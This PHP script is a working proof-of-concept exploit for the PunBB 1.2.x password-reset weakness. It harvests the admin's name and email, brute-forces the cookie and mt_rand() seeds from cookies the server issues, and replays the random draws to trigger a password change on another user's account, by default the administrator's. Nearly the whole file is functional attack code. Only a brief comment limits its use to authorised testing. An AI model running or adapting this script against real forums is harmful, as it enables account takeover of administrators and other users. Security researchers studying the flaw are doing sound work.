<?php
/**
 * Original : http://sektioneins.de/advisories/SE-2008-01.txt
 * Thanks to Stefan Esser, here's the exploit.
 *
 * Team : EpiBite
 * firefox, petit-poney, thot
 * We would like to thank our respective moms and dads.
 * Let's get a coffee!
 *
 * Proof of concept for the PunBB 1.2.x password-reset weakness (SE-2008-01):
 * the script logs in with a real account, brute-forces the target's cookie
 * seed and the mt_rand() seed behind a guest cookie, replays the server's
 * random draws and finally calls profile.php?action=change_pass for another
 * user. Run it only against an installation you are authorised to test.
 */

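// conf
// Every setting can be overridden from the environment (PWNBB_URL, PWNBB_EMAIL,
// PWNBB_LOGIN, PWNBB_PASS) so that real credentials do not have to be written
// into (and committed with) this file; the literals are only local defaults.
function pwnbb_conf($env_name, $default)
{
    // getenv() returns false when the variable is not set
    $value = getenv($env_name);
    return $value === false ? $default : $value;
}
define('URL', pwnbb_conf('PWNBB_URL', 'http://localhost/punbb_1-2-16_fr/upload')); // base url, no trailing slash (paths below start with '/')
define('EMAIL', pwnbb_conf('PWNBB_EMAIL', 'login_x@epitech.net'));                // email of the account you hold on the target
define('LOGIN', pwnbb_conf('PWNBB_LOGIN', 'login_x'));                            // your login
define('PASS', pwnbb_conf('PWNBB_PASS', '620553.8I73'));                          // your pass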
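// Exploit
printf("--\nUrl : %s\nEmail : %s\n--\n", URL, EMAIL);

// Step 1: the public member list sorted by registration date (ascending) shows
// the oldest account first. The script assumes that entry is the admin, takes
// its name, and uses its registration day as the origin of the seed search.
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/userlist.php?username=&show_group=-1&sort_by=registered&sort_dir=ASC&search=Envoyer');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
$s = curl_exec($h);
if ($s === false)
    die("Cannot fetch the user list: ".curl_error($h)."\n");
curl_close($h);
if (!preg_match('/profile\.php\?id=([0-9]*)">([^<]*)</', $s, $m))
    die("No profile link found in the user list; check URL\n");
define('ADMIN', $m[2]);
// Registration day as printed in the list (YYYY-MM-DD), turned into a unix
// timestamp at local midnight.
// NOTE(review): mktime() uses this script's timezone, not the target's; if
// they differ the seed search may have to start earlier than DATE.
if (preg_match('/<td class="tcr">([0-9]{4})-([0-9]{2})-([0-9]{2})<\/td/', $s, $m))
    define('DATE', mktime(0, 0, 0, (int)$m[2], (int)$m[3], (int)$m[1]));
else
    define('DATE', time() - 86400); // just in case: the forum or the account has only just been created
printf("Admin : %s\nDate : %s\n--\n", ADMIN, DATE);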
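// Step 2: submit a forgotten-password request for our own address. The
// response page contains a mailto: link, which the script reads as the admin's
// email. It is normally found automatically; if that fails, set the
// PWNBB_ADMIN_MAIL environment variable and this request is skipped.
$manual_admin_mail = getenv('PWNBB_ADMIN_MAIL');
if ($manual_admin_mail !== false)
    define('ADMIN_MAIL', $manual_admin_mail);
else
{
    $h = curl_init();
    curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2');
    // curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128'); // uncomment to go through a proxy
    curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($h, CURLOPT_HEADER, 1);
    curl_setopt($h, CURLOPT_POST, 1);
    curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',
                                                         'req_email='.urlencode(EMAIL),
                                                         'request_pass=Envoyer')));
    $s = curl_exec($h);
    if ($s === false)
        die("forget_2 request failed: ".curl_error($h)."\n");
    curl_close($h);
    if (!preg_match('/mailto:([^"]*)"/', $s, $m))
        die("No mailto: link in the forget-password page; set PWNBB_ADMIN_MAIL manually\n");
    define('ADMIN_MAIL', $m[1]);
}
printf("Admin mail : %s\n--\n", ADMIN_MAIL);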
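// The punbb_cookie value is a URL-encoded serialize()d array
// a:2:{i:0;i:<user id>;i:1;s:32:"<md5>";}. The original script read it back
// with unserialize(), which on data chosen by the remote server is a PHP
// object-injection sink (it instantiates whatever classes the payload names).
// Only the second element, a plain string, is needed, so it is extracted
// with a regex instead. Returns null when no such cookie is in the response.
function pwnbb_cookie_hash($raw_response)
{
    if (!preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/', $raw_response, $m))
        return null;
    if (!preg_match('/i:1;s:[0-9]+:"([^"]*)";/', urldecode($m[1]), $m))
        return null;
    return $m[1];
}

// Step 3: repeat the forgotten-password request, this time for the admin's
// address and with a deliberately invalid punbb_cookie (user id 2, bogus
// hash). The server answers with a fresh guest cookie; the script models its
// hash as md5(cookie_seed . random_pass(8)) and brute-forces the mt_rand()
// seed against it further down.
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128'); // uncomment to go through a proxy
curl_setopt($h, CURLOPT_COOKIE, 'punbb_cookie='.rawurlencode(serialize(array(0 => 2, 1 => md5('bite')))));
curl_setopt($h, CURLOPT_HEADER, 1);
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',
                                                     'req_email='.urlencode(ADMIN_MAIL),
                                                     'request_pass=Envoyer')));
$s = curl_exec($h);
if ($s === false)
    die("forget_2 request (admin) failed: ".curl_error($h)."\n");
curl_close($h);
$guest_hash = pwnbb_cookie_hash($s);
if ($guest_hash === null)
    die("No punbb_cookie in the forget-password response\n");
define('MD5_NOT_LOGGUED', $guest_hash);
printf("Md5 not loggued : %s\n--\n", MD5_NOT_LOGGUED);

// Step 4: log in with our own account. The script models the resulting cookie
// hash as md5(cookie_seed . sha1(PASS)); PASS being known, this is what the
// cookie-seed search below checks candidates against.
// Credentials are URL-encoded here: the original sent them raw, so a password
// containing '&', '+' or '%' would have been mangled.
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=in');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($h, CURLOPT_HEADER, 1);
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128'); // uncomment to go through a proxy
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',
                                                     'redirect_url=index.php',
                                                     'req_username='.urlencode(LOGIN),
                                                     'req_password='.urlencode(PASS))));
$s = curl_exec($h);
if ($s === false)
    die("login request failed: ".curl_error($h)."\n");
curl_close($h);
$logged_hash = pwnbb_cookie_hash($s);
if ($logged_hash === null)
    die("No punbb_cookie in the login response; check LOGIN/PASS\n");
define('MD5_LOGGUED', $logged_hash);
printf("Md5 loggued : %s\n--\n", MD5_LOGGUED);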
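// Step 5: recover the target's 8-character cookie seed. The script models it
// as the last 8 hex digits of md5(<unix timestamp>) for a timestamp within two
// days after DATE, and accepts the candidate for which
// md5(seed . sha1(PASS)) equals the logged-in cookie hash.
define('PASS_MD5ED', sha1(PASS)); // name kept for compatibility: it is a SHA-1, not an MD5
$chars = array('/', '-', "\\", '|'); // progress spinner; the next loop reuses it
$window = 86400 * 2;
for ($p = 0; $p < $window; $p++)
{
    if (!($p % 300))
        echo $chars[($p / 300) % 4]."\r";
    $candidate = substr(md5(DATE + $p), -8);
    if (md5($candidate.PASS_MD5ED) === MD5_LOGGUED)
    {
        define('SEED', $candidate);
        break;
    }
}
// Without this check the original went on with an undefined SEED constant.
if (!defined('SEED'))
    die("Cookie seed not found within ".$window." seconds after ".DATE."; widen the window or check the timezone\n");
printf("Seed : %s\n--\n", SEED);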
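// Step 6: recover the mt_rand() seed the server used when it issued the guest
// cookie of step 3. The script assumes the seed is an integer below 1,000,000
// and that the first random_pass(8) drawn after seeding is the one in the
// cookie, i.e. md5(SEED . random_pass(8)) == MD5_NOT_LOGGUED.
//
// NOTE(review): PHP 7.1 changed the mt_rand() generator; the previous
// (PHP 5.2.1 - 7.0) sequence is only reproduced in MT_RAND_PHP mode. A
// PunBB 1.2.16-era target runs PHP 5, so on a PHP >= 7.1 attacker box the
// legacy mode must be selected or no seed will ever match. PHP 5's mt_srand()
// takes a single argument, hence the defined() check. If the target itself
// runs PHP >= 7.1, drop the MT_RAND_PHP flag.
$mt_legacy = defined('MT_RAND_PHP');
for ($p = 0; $p < 1000000; $p++)
{
    if (!($p % 300))
        echo $chars[($p / 300) % 4]."\r";
    if ($mt_legacy)
        mt_srand($p, MT_RAND_PHP);
    else
        mt_srand($p);
    if (md5(SEED.random_pass(8)) === MD5_NOT_LOGGUED)
    {
        define('SRAND', $p);
        break;
    }
}
// Without this check the original went on with an undefined SRAND constant.
if (!defined('SRAND'))
    die("mt_srand() seed not found in 0..999999; the target may seed differently or run another PHP version\n");
printf("SRAND : %s\n--\n", SRAND);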
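// Step 7: replay the server's random draws with the recovered seed. The order
// matters and must not be changed: 1st random_pass(8) = the guest-cookie
// password (already accounted for by the SRAND search), 2nd = the password
// the target generated for the victim (printed), 3rd = the key expected by
// profile.php?action=change_pass.
// MT_RAND_PHP selects PHP's legacy (pre-7.1) mt_rand() sequence, which is the
// one a PHP 5 target produces; PHP 5's mt_srand() has no second argument.
if (!defined('SRAND'))
    die("SRAND is not set; the seed search failed\n");
if (defined('MT_RAND_PHP'))
    mt_srand(SRAND, MT_RAND_PHP);
else
    mt_srand(SRAND);
random_pass(8); // guest-cookie password, discarded
$new_password = random_pass(8);
$new_password_key = random_pass(8);
printf("New password : %s\n--\n", $new_password);
$target_id = 2; // the admin's id, but you can change your target
$url = URL.'/profile.php?id='.$target_id.'&action=change_pass&key='.urlencode($new_password_key);
$h = curl_init();
curl_setopt($h, CURLOPT_URL, $url);
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
$r = curl_exec($h);
if ($r === false)
    die("change_pass request failed: ".curl_error($h)."\n");
// The original discarded the response; at least report the status code so a
// rejected key (wrong seed, expired request) is visible.
printf("change_pass : HTTP %d\n--\n", curl_getinfo($h, CURLINFO_HTTP_CODE));
curl_close($h);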
/**
 * Draw an alphanumeric string of $len characters with mt_rand().
 *
 * This mirrors the target's random_pass() (same name as PunBB's helper —
 * presumably identical; verify against the target's functions.php). It is
 * NOT a secure generator and must not be "fixed": the exploit only works if
 * the draws after mt_srand() reproduce the server's exactly, so the alphabet,
 * the biased mt_rand() % strlen() selection and the call order all have to
 * stay as they are.
 *
 * @param int $len number of characters; 0 or less yields ''
 * @return string
 */
function random_pass($len)
{
    $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
    $size = strlen($alphabet);
    $out = '';
    while ($len-- > 0)
        $out .= $alphabet[mt_rand() % $size];
    return $out;
}